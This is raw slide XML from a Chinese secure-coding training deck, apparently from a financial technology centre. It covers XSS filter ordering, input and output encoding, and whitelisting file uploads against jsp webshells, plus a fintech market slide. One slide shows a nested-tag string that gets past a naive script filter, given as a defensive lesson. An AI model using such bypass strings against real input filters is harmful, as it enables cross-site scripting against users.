                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;scrip&lt;script&gt;t&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>过滤掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>后还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>需要注意多个过滤器的先后次序。当多个过滤器一起生效时，有可能后进行的过滤导致前面的过滤失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52232" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="3147095"/>
            <a:ext cx="81534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7800" indent="-177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pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输入编码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入编码往往可以有全局的解决方案，从设计的角度来看，这是最佳的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一旦数据已经入库，就难以用输出编码处理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52233" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="4269457"/>
            <a:ext cx="7543800" cy="8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7800" indent="-177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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输出编码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出编码可以解决输入编码无法处理的已入库数据，但也导致了工作量的增加。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52234" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683568" y="5309129"/>
            <a:ext cx="69342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7800" indent="-177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30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>四</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户安全加固：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>小心点击来源不明的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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41050" y="2132856"/>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94802"/>
            <a:ext cx="6624637" cy="652486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逻辑缺陷： 后台认证绕过漏洞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口令管理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未释放资源</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弱加密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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="133191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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>使用白名单校验上传文件类型、大小限制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【释义说明】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>文件上传过程中，通常因为未校验上传文件后缀类型，导致用户可上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>等一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>文件，可重点关注对上传文件类型是否有足够安全的校验，以及是否限制文件大小等。</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828664" y="3104167"/>
            <a:ext cx="1520519" cy="17321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2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>市场环境与新技术驱动金融软件开发的变革</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470153" y="1574415"/>
            <a:ext cx="8060817" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年起，基于信息技术、互联网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>移动互联网，大数据等，金融业发展形势发生了巨大的变化。互联网金融的异军突起，使得银行业竞争更加激烈。金融机构（银行、保险）等在如此的市场环境下，必须业务创新、必须技术创新 ，打造更透明、更便捷、更高效的金融软件产品。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="556341" y="2834566"/>
            <a:ext cx="5641709" cy="2860978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="组合 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7137572" y="2981362"/>
            <a:ext cx="3008196" cy="2123658"/>
            <a:chOff x="8206472" y="2889041"/>
            <a:chExt cx="4010927" cy="2831542"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8661399" y="2889041"/>
              <a:ext cx="3556000" cy="2831542"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更敏捷</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更便捷</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更高效</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更友好</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更稳定</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t>更安全</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8234148" y="4886617"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="棱台 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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17" name="矩形 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8206472" y="3474685"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785099" y="6165271"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="棱台 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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24" name="矩形 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785099" y="6165271"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="组合 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8206473" y="3793546"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="棱台 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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27" name="矩形 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="组合 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8206472" y="4058591"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="棱台 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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30" name="矩形 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="组合 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8206472" y="4289421"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="棱台 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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33" name="矩形 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8213720" y="4600630"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="棱台 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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36" name="矩形 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
